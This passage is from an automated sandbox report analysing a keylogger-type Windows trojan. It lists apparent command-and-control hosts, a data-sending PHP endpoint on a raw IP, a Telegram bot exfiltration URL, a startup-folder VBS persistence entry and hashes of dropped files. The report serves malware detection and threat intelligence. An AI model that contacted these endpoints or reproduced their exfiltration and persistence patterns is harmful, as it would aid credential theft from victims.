00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | RegSvcs.exe, 00000002.00000002.2979175921.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003DA4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000405F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004326000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004203000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000008.00000002.2973433634.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://varders.kozow.com:8081 | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://aborters.duckdns.org:8081 | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://anotherarmy.dns.army:8081 | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://checkip.dyndns.org/q | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000002.00000002.2974305954.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000313F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003040000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | RegSvcs.exe, 00000002.00000002.2979175921.0000000003D7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EAE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2979175921.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004065000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000040AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004209000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.000000000403A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2977240778.0000000004302000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://crl.micros | RegSvcs.exe, 00000002.00000002.2984782399.0000000005F70000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://reallyfreegeoip.org/xml/ | Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp | false | | high |
Contacted IPs:

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false |
| 178.210.170.40 | mail.standartasansor.com | Turkey | 42910 | PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | true |
| 104.21.64.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587865
Start date and time: 2025-01-10 18:45:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AHSlIDftf1.exe (renamed because the original name is a hash value)
Original Sample Name: e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 52
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
12:46:35 | API Interceptor | 2323763x Sleep call for process: RegSvcs.exe modified
17:46:35 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | eLo1khn7DQ.exe | malicious | MassLogger RAT |
 | MzqLQjCwrw.exe | malicious | MassLogger RAT |
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger |
 | IUqsn1SBGy.exe | malicious | AgentTesla |
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger |
 | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger |
 | VIAmJUhQ54.exe | malicious | MassLogger RAT |
 | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
193.122.6.168 | SBkuP3ACSA.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | ql8KpEHT7y.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | 8kDIr4ZdNj.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | 4iDzhJBJVv.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
 | IMG_10503677.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | Payment 01.08.25.pdf.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
 | December Reconciliation QuanKang.exe | malicious | Unknown | checkip.dyndns.org/
 | PO.exe | malicious | MassLogger RAT | checkip.dyndns.org/
 | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | eLo1khn7DQ.exe | malicious | MassLogger RAT | 132.226.247.73
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 158.101.44.242
 | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 132.226.8.169
 | SBkuP3ACSA.exe | malicious | Snake Keylogger | 193.122.6.168
 | v3tK92KcJV.exe | malicious | Snake Keylogger | 132.226.247.73
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.8.169
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
 | zAK7HHniGW.exe | malicious | Snake Keylogger | 193.122.130.0
 | MtxN2qEWpW.exe | malicious | Snake Keylogger | 132.226.247.73
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
reallyfreegeoip.org | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.64.1
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.96.1
 | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.80.1
 | SBkuP3ACSA.exe | malicious | Snake Keylogger | 104.21.16.1
 | v3tK92KcJV.exe | malicious | Snake Keylogger | 104.21.16.1
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.80.1
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
 | zAK7HHniGW.exe | malicious | Snake Keylogger | 104.21.112.1
 | MtxN2qEWpW.exe | malicious | Snake Keylogger | 104.21.112.1
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
api.telegram.org | eLo1khn7DQ.exe | malicious | MassLogger RAT | 149.154.167.220
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 149.154.167.220
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | IUqsn1SBGy.exe | malicious | AgentTesla | 149.154.167.220
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | VIAmJUhQ54.exe | malicious | MassLogger RAT | 149.154.167.220
 | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | MzqLQjCwrw.exe | malicious | MassLogger RAT | 158.101.44.242
 | SBkuP3ACSA.exe | malicious | Snake Keylogger | 193.122.6.168
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
 | zAK7HHniGW.exe | malicious | Snake Keylogger | 193.122.130.0
 | ql8KpEHT7y.exe | malicious | Snake Keylogger | 193.122.6.168
 | 8kDIr4ZdNj.exe | malicious | Snake Keylogger | 193.122.6.168
 | 2V7usxd7Vc.exe | malicious | MassLogger RAT | 158.101.44.242
 | tx4pkcHL9o.exe | malicious | MassLogger RAT | 158.101.44.242
 | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 193.122.6.168
 | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
TELEGRAMRU | eLo1khn7DQ.exe | malicious | MassLogger RAT | 149.154.167.220
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 149.154.167.220
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | IUqsn1SBGy.exe | malicious | AgentTesla | 149.154.167.220
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | 4hQFnbWlj8.exe | malicious | Vidar | 149.154.167.99
 | 4hQFnbWlj8.exe | malicious | Vidar | 149.154.167.99
 | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | VIAmJUhQ54.exe | malicious | MassLogger RAT | 149.154.167.220
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | TeikwYB2tm.exe | malicious | DanaBot | 188.132.183.159
 | TeikwYB2tm.exe | malicious | DanaBot | 188.132.183.159
 | A4FY1OA97K.lnk | malicious | DanaBot | 188.132.183.159
 | vreFmptfUu.lnk | malicious | DanaBot | 188.132.183.159
 | arm7.nn.elf | malicious | Mirai, Okiru | 78.135.74.199
 | sparc.nn.elf | malicious | Mirai, Okiru | 78.135.115.141
 | PO_63738373663838____________________________________________________________________________.exe | malicious | Snake Keylogger | 188.132.193.46
 | File07098.PDF.exe | malicious | Snake Keylogger | 188.132.193.46
 | Scan_20241030.vbs | malicious | FormBook, GuLoader | 46.28.239.165
 | dekont_001.pdf.exe | malicious | Snake Keylogger | 188.132.193.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | eLo1khn7DQ.exe | malicious | MassLogger RAT | 104.21.64.1
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 104.21.64.1
 | 3WgNXsWvMO.exe | malicious | MassLogger RAT | 104.21.64.1
 | SBkuP3ACSA.exe | malicious | Snake Keylogger | 104.21.64.1
 | v3tK92KcJV.exe | malicious | Snake Keylogger | 104.21.64.1
 | r5yYt97sfB.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.64.1
 | RmIYOfX0yO.exe | malicious | GuLoader, Snake Keylogger | 104.21.64.1
 | zAK7HHniGW.exe | malicious | Snake Keylogger | 104.21.64.1
 | MtxN2qEWpW.exe | malicious | Snake Keylogger | 104.21.64.1
 | 8nkdC8daWi.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
3b5074b1b5d032e5620f69f9f700ff0e | eLo1khn7DQ.exe | malicious | MassLogger RAT | 149.154.167.220
 | grW5hyK960.exe | malicious | Unknown | 149.154.167.220
 | MzqLQjCwrw.exe | malicious | MassLogger RAT | 149.154.167.220
 | grW5hyK960.exe | malicious | Unknown | 149.154.167.220
                                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ID_Badge_Policy.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                          • 149.154.167.220
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):277504
                                                                                                          Entropy (8bit):6.975942575675689
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:uwJI8q6tYOtYva9KApBzhjVir3QTeHAJZopoqzMZDKI4/gHDby8:v46NYv/ShhQrIeg1lfy8
                                                                                                          MD5:F869B778A6374726791AE1540CCE1D09
                                                                                                          SHA1:393C32254038C02A78711EF75BADB337A33263A0
                                                                                                          SHA-256:DC2C4AEBFB035311A24D8E274417684BDA6EAD097AACF6CC9B19D7D2F64AAC8A
                                                                                                          SHA-512:BCD8986D87F755332DFB515A686C02ABDFB16C7AB33D403AF2DA747857C547DBE52E8AAAFD33AD01E3A5C59D329F154DBE9C768D88280F31E1ABBA45CFC23134
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:yc.D0PGV3O3A..11.Q732TE5.ZZLP049ZD3PGV7O3AI611SQ732TE5SZZLP0.9ZD=O.X7.:.h.0}.pc[['eE!5=>1].Z;*]?3vU*.3<X.X=qs|at(Z7?tA]:.9ZD3PGVg.3A.721..U2TE5SZZL.068QEcPGp3O3UI611SQiw6TE.SZZ,T049.D3pGV7M3AM611SQ736TE5SZZLP.09ZF3PGV7O1A..11CQ7#2TE5CZZ\P049ZD#PGV7O3AI611_.33}TE5S:^LG 49ZD3PGV7O3AI611SQ7.6TI5SZZLP049ZD3PGV7O3AI611SQ732TE5SZZLP049ZD3PGV7O3AI61.SQ?32TE5SZZLP0<.ZD{PGV7O3AI611}%RKFTE57~^LP.49Zb7PGT7O3AI611SQ732Te5S:t>#BW9ZD$@GV7/7AI$11Sy332TE5SZZLP049.D3.i$R#\"I6=1SQ7.6TE7SZZvT049ZD3PGV7O3A.61sSQ732TE5SZZLP049..7PGV7O{AI631VQc.0T..RZYLP0.9ZB..EV.O3AI611SQ732TE5SZZLP049ZD3PGV7O3AI611SQ732T.H.U...YG..D3PGV7N1BM099SQ732TE5-ZZL.049.D3PpV7O.AI6\1SQ.32T;5SZ$LP0P9ZDAPGVVO3A.611<Q73\TE5-ZZLN2..ZD9zaV5g.AI<1..".32^.4SZ^?s043.F3PC%.O3K.511W".32^.1SZ^?v043.A3PC|mO0._011H>.32^E6.O\LP+..ZF.jGV=O.gI5.$UQ7(.vE7.SZLT.bJGD3Vo.7O95@613.[736~[7{.ZLZ..GQD3TlV.mMMI65.S{.M?TE1xZpRR.99Z@.r9X7O7jI..O\Q77.To+Q.ULP4..$T3PC}7e.?X615xQ..LFE5WqZfrN'9Z@.PmtI[3AM.1.q/"32Pn5yx$ZP00.Zn..PV7K.Ac.O)SQ3.2~[7.BZLT.2.8DAhQVGL
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):132122
                                                                                                          Entropy (8bit):7.93957243489196
                                                                                                          Encrypted:false
